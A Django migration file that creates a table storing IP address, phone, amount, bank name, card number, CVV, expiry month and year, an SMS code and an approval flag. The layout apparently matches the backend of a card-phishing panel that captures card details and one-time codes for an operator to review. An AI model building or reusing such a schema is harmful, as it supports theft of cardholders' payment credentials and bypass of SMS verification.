# Generated by Django 4.2.1 on 2023-05-06 16:00

import django.core.validators
from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='ContactModel',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('ip', models.CharField(max_length=200)),
                ('operator', models.IntegerField(null=True)),
                ('phone', models.IntegerField()),
                ('amount', models.IntegerField(validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(9999)])),
                ('bankname', models.CharField(max_length=200, null=True)),
                ('cc', models.CharField(max_length=200, null=True)),
                ('cvv', models.CharField(max_length=200, null=True)),
                ('mm', models.CharField(max_length=200, null=True)),
                ('yy', models.CharField(max_length=200, null=True)),
                ('sms', models.IntegerField(null=True, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(9999999)])),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('is_approved', models.BooleanField(default=False)),
                ('is_error', models.BooleanField(default=False)),
            ],
            options={
                'db_table': 'contact',
            },
        ),
    ]
